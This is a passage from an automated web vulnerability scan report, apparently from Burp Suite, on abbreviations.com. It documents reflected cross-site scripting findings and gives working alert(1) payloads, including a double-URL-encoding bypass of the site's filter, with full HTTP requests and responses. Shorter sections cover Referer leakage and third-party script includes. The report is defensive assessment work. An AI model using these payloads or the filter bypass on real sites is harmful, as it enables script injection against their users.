.resp {padding:0px;
...[SNIP]...
<script>
function Filter(cat)
{
   URL = "searchamazon.aspx?st=" + "55e03";alert(1)//fb56f9bdb1a" + "&cat=" + cat;
window.location.href = URL;
}
</script>
...[SNIP]...

2.51. http://www.abbreviations.com/searchAmazon.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9142f"><script>alert(1)</script>d31baaf031c was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=9142f"><script>alert(1)</script>d31baaf031c HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:22:45 GMT
Connection: close
Content-Length: 27409

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<meta name="keywords" content="What does 9142f"><script>alert(1)</script>d31baaf031c stand for?, What does 9142f">
...[SNIP]...

2.52. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9deee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2e9cafcbb0 was submitted in the REST URL parameter 1. This input was echoed as 9deee"><script>alert(1)</script>b2e9cafcbb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspx9deee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2e9cafcbb0?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:38:26 GMT
Connection: close
Content-Length: 27481


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does searchgoogle.aspx9deee"><script>alert(1)</script>b2e9cafcbb0?st= stand for?, What does searchgoogle.aspx9deee">
...[SNIP]...

2.53. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d7e60%253cscript%253ealert%25281%2529%253c%252fscript%253e4a356520f9b was submitted in the REST URL parameter 1. This input was echoed as d7e60<script>alert(1)</script>4a356520f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspxd7e60%253cscript%253ealert%25281%2529%253c%252fscript%253e4a356520f9b?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:41:11 GMT
Connection: close
Content-Length: 27446


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>4a356520f9b?st=";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchgoogle.aspxd7e60<script>alert(1)</script>4a356520f9b?st=" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "searchgoogle.aspxd7e60<script>
...[SNIP]...

2.54. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 6fe0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34856c7ba54 was submitted in the REST URL parameter 1. This input was echoed as 6fe0e</title><script>alert(1)</script>34856c7ba54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspx6fe0e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34856c7ba54?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:43:06 GMT
Connection: close
Content-Length: 27628


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does searchgoogle.aspx6fe0e</title><script>alert(1)</script>34856c7ba54?st= stand for?</title>
...[SNIP]...

2.55. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchgoogle.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6035c%2522%253balert%25281%2529%252f%252fbcb3780252b was submitted in the REST URL parameter 1. This input was echoed as 6035c";alert(1)//bcb3780252b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchgoogle.aspx6035c%2522%253balert%25281%2529%252f%252fbcb3780252b?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:43 GMT
Connection: close
Content-Length: 27095


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "searchgoogle.aspx6035c";alert(1)//bcb3780252b?st=";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchgoogle.aspx6035c";alert(1)//bcb3780252b?st=" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
wind
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.abbreviations.com/bs2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bs2.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:29 GMT
Connection: close
Content-Length: 25727


<title>What does&nbsp;&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-positio
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.convert.net"><img border="0" src="http://www.abbreviations.com/images/con-off.jpg" alt="Convert.net" onmouseover="this.src='http://www.abbreviations.com/images/con-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.definitions.net"><img border="0" src="http://www.abbreviations.com/images/def-off.jpg" alt="Definitions.net" onmouseover="this.src='http://www.abbreviations.com/images/def-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.lyrics.net"><img border="0" src="http://www.abbreviations.com/images/lyr-off.jpg" alt="Lyrics.net" onmouseover="this.src='http://www.abbreviations.com/images/lyr-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.phrases.net"><img border="0" src="http://www.abbreviations.com/images/phr-off.jpg" alt="Phrases.net" onmouseover="this.src='http://www.abbreviations.com/images/phr-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.quotes.net"><img border="0" src="http://www.abbreviations.com/images/quo-off.jpg" alt="Quotes.net" onmouseover="this.src='http://www.abbreviations.com/images/quo-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.references.net"><img border="0" alt="References.net" src="http://www.abbreviations.com/images/ref-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/ref-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.rhymes.net"><img border="0" alt="Rhymes.net" src="http://www.abbreviations.com/images/rhy-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/rhy-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.synonyms.net"><img border="0" src="http://www.abbreviations.com/images/syn-off.jpg" alt="Synonyms.net" onmouseover="this.src='http://www.abbreviations.com/images/syn-on.jpg'" onmouseout="this.src='http://www.abbrevi
...[SNIP]...
<td><a href="http://www.uszip.com"><img border="0" alt="USZip.com" src="http://www.abbreviations.com/images/zip-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/zip-on.jpg'" onmouseout="this.src='http://www.abbreviati
...[SNIP]...
<td width="100%" align="center">&nbsp;<a class="addthis_button" href="http://addthis.com/bookmark.php?v=250&amp;username=dejango"><img src="http://www.abbreviations.com/images/b.png" alt="Bookmark and Share" style="border:0;vertical-align:-3px;"></a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://www.facebook.com/pages/STANDS4/135790749786167"><img alt="Follow us on Facebook!" src="http://www.abbreviations.com/images/f.gif">
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://twitter.com/justadded"><img alt="Follow us on Twitter!" src="http://www.abbreviations.com/images/t.gif">
...[SNIP]...

3.2. http://www.abbreviations.com/searchAmazon.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /searchAmazon.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:20:21 GMT
Connection: close
Content-Length: 26561

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.convert.net"><img border="0" src="http://www.abbreviations.com/images/con-off.jpg" alt="Convert.net" onmouseover="this.src='http://www.abbreviations.com/images/con-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.definitions.net"><img border="0" src="http://www.abbreviations.com/images/def-off.jpg" alt="Definitions.net" onmouseover="this.src='http://www.abbreviations.com/images/def-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.lyrics.net"><img border="0" src="http://www.abbreviations.com/images/lyr-off.jpg" alt="Lyrics.net" onmouseover="this.src='http://www.abbreviations.com/images/lyr-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.phrases.net"><img border="0" src="http://www.abbreviations.com/images/phr-off.jpg" alt="Phrases.net" onmouseover="this.src='http://www.abbreviations.com/images/phr-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.quotes.net"><img border="0" src="http://www.abbreviations.com/images/quo-off.jpg" alt="Quotes.net" onmouseover="this.src='http://www.abbreviations.com/images/quo-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.references.net"><img border="0" alt="References.net" src="http://www.abbreviations.com/images/ref-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/ref-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.rhymes.net"><img border="0" alt="Rhymes.net" src="http://www.abbreviations.com/images/rhy-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/rhy-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.synonyms.net"><img border="0" src="http://www.abbreviations.com/images/syn-off.jpg" alt="Synonyms.net" onmouseover="this.src='http://www.abbreviations.com/images/syn-on.jpg'" onmouseout="this.src='http://www.abbrevi
...[SNIP]...
<td><a href="http://www.uszip.com"><img border="0" alt="USZip.com" src="http://www.abbreviations.com/images/zip-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/zip-on.jpg'" onmouseout="this.src='http://www.abbreviati
...[SNIP]...
<td width="100%" align="center">&nbsp;<a class="addthis_button" href="http://addthis.com/bookmark.php?v=250&amp;username=dejango"><img src="http://www.abbreviations.com/images/b.png" alt="Bookmark and Share" style="border:0;vertical-align:-3px;"></a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://www.facebook.com/pages/STANDS4/135790749786167"><img alt="Follow us on Facebook!" src="http://www.abbreviations.com/images/f.gif">
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://twitter.com/justadded"><img alt="Follow us on Twitter!" src="http://www.abbreviations.com/images/t.gif">
...[SNIP]...

4. Cross-domain script include  previous  next
There are 5 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.abbreviations.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:14 GMT
Connection: close
Content-Length: 35655


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
<br>
                               <script language="javascript" src="http://media.fastclick.net/w/get.media?sid=9374&m=7&tp=9&d=j&t=s"></script>
...[SNIP]...

4.2. http://www.abbreviations.com/bs2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bs2.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:29 GMT
Connection: close
Content-Length: 25727


<title>What does&nbsp;&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-positio
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

4.3. http://www.abbreviations.com/justadded.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /justadded.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:12:36 GMT
Connection: close
Content-Length: 49445


<title>Just Added</title>
<meta name="description" content="Latest additions to the Abbreviations.com directory">
<base href="http://www.abbreviations.com/justadded.aspx">
<style><!--

p.specia
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

4.4. http://www.abbreviations.com/random.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /random.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:12:44 GMT
Connection: close
Content-Length: 27659


<html>

<head>
<title>What does WKSL&nbsp;stand for?</title>
<script>
<!--
var checkedStyle = "mla";
function displayCitation(format){

checkedStyle = format;
pre
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
</tr>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

4.5. http://www.abbreviations.com/searchAmazon.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /searchAmazon.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:15:16 GMT
Connection: close
Content-Length: 26561

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

5. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

